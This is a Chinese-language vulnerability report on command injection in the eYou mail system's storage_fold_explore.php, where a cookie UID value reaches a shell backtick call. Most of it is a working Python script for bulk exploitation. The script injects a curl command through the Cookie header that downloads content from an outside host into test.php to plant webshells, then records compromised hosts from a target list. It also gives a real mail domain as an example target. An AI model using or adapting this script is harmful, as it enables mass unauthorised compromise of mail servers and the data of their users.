亿邮邮件系统命令执行漏洞导致批量Getwebshell

### 简要描述： 这套系统还有很多问题，能登录就更多问题了。 ### 详细说明： user/storage_fold_explore.php ``` <?php /** * 用户网络存储目录列表 * * 该页面显示登录邮箱用户的网络存储目录列表，选择后保存邮件附件到指定的目录中。 * * @author FengHui <fenghui@eyou.net> * @copyright 199902008 eYou.net * @version storage_explore.php 2008/11/12 */ require_once('/var/eyou/apache/htdocs/config.php'); require_once(PATH.'inc/function.php'); require_once(PATH.'inc/libeyou.php'); require_once(PATH.'inc/operate.php'); require_once(PATH.'inc/user.config.php'); $skin = getCookieUserValue('SKIN'); $uid = getCookieUserValue('UID'); $domain = getCookieUserValue('DOMAIN'); $user_dir_path = getUserDirPath($uid, $domain); $storage_index_path = $user_dir_path.'/storage/Index/'; $storage_data_path = $user_dir_path.'/storage/Data/'; $file_name = htmlspecialchars(get('file')); $att = htmlspecialchars(get('att')); ?> ``` GetUser_DirPath在/inc/function.php下。 ``` function getUserDirPath($uid, $domain) { $cmd = "/var/eyou/sbin/hashid $uid $domain"; $path = `$cmd`; $path = trim($path); return $path; } ``` ### 漏洞证明： 利用代码： ``` __author__ = 'zengzhang' import time,sys import urllib,urllib2 from urlparse import urlparse def Getwebshell(url): url=url.strip() header={"Cookie":"USER=UID%3d1|curl http://conqu3r.paxmac.org/test.txt>>test.php&DOMAIN%3d127.0.0.1"} try: request=urllib2.Request(url,None,headers=header) rep=urllib2.urlopen(request) except: pass Indentified(url) def Readfile(filen): fp=open(filen,'r') for url in fp: if url!='': Getwebshell(url) def Indentified(url): url=url[:-19] url=url+"test.php" try: f=urllib.urlopen(url).getcode() if f==200: fp=open("shell.txt","w+") fp.write(url+"\n") fp.close() except: pass Readfile("url.txt") ``` url.txt内容为：http://mail.bjsasc.com/user/storage_fold_explore.php形式 [<img src="https://images.seebug.org/upload/201404/26113819905107dc893d244259c457ba88e324b3.png" alt="EF3B5D39-11D7-4760-8E23-A0CA283D7843.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/26113819905107dc893d244259c457ba88e324b3.png)